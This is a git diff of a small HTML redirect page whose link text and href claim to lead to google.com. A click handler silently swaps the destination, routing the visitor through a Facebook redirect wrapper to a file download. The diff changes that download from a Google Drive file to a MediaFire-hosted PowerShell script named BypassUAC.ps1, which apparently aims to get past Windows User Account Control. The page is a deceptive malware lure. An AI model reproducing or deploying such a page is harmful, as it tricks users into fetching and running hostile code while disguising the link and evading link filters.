--- a/index.html
+++ b/index.html
@@ -3,20 +3,19 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Redirect</title>
+    <title>Redirect Example</title>
 </head>
 <body>
-    <center>
-        <h1>Clique no link abaixo para ser redirecionado:</h1>
-    <a href="https://google.com" id="redirectLink">Link para Google.com </a>
-    </center>
+    <p>Click on link to Redirect:</p>
+    <a href="https://google.com" id="redirectLink">Link para Google.com</a>
+
     <script>
-        // Função para redirecionar ao clicar no link
         document.getElementById("redirectLink").addEventListener("click", function(event) {
-            event.preventDefault(); // Prevenir o comportamento padrão de seguir o link
-            window.location.href = "https://l.facebook.com/l.php?u=https://drive.usercontent.google.com/download?id=1iKn8MsiDNSX_Y7-ezhwHeWbeVpj5MYAI&export=download&authuser=0&confirm=t&uuid=a5690d9f-a803-415d-bc76-a56c8f1e89e1&at=APZUnTW8_zO3IIP9eMJCEqxtHq8b:1715118306403&h=AT2lJ_ex1mpz8Z0hGxM6hGXvG20JbXwTmeTpJl72_lAB5VnEOL81vUzqAcVH6Z8lZM4OWqHn4MKU-pdKJLPwS3jBi0KjBcIPvQlXfI67qFh3Pl0eoyfnqcbRm6YCrc2FIaPdgU67pN_Cxw"; 
+            event.preventDefault();
+            window.location.href = "https://l.facebook.com/l.php?u=https://download1648.mediafire.com/4882tmhs2b8gmOIQGqr-lp1i49eN78LmcBQbaPTeUcHoeQD5NMEejdeu-udPCWn3ieD8kJgMYRLwUoNredhNtBPovbECpCpjavNmw0lCqVpFabYfLhJ2uyc4QTAJLpXj3JBaghD3zVTAgH81ZrlpgcR9Bc2x6YxSTTGNwuwiDjznpQ/byk90qeuc0c8auj/BypassUAC.ps1&h=AT2lJ_ex1mpz8Z0hGxM6hGXvG20JbXwTmeTpJl72_lAB5VnEOL81vUzqAcVH6Z8lZM4OWqHn4MKU-pdKJLPwS3jBi0KjBcIPvQlXfI67qFh3Pl0eoyfnqcbRm6YCrc2FIaPdgU67pN_Cxw"; 
         });
     </script>
 </body>
 </html>
+
 
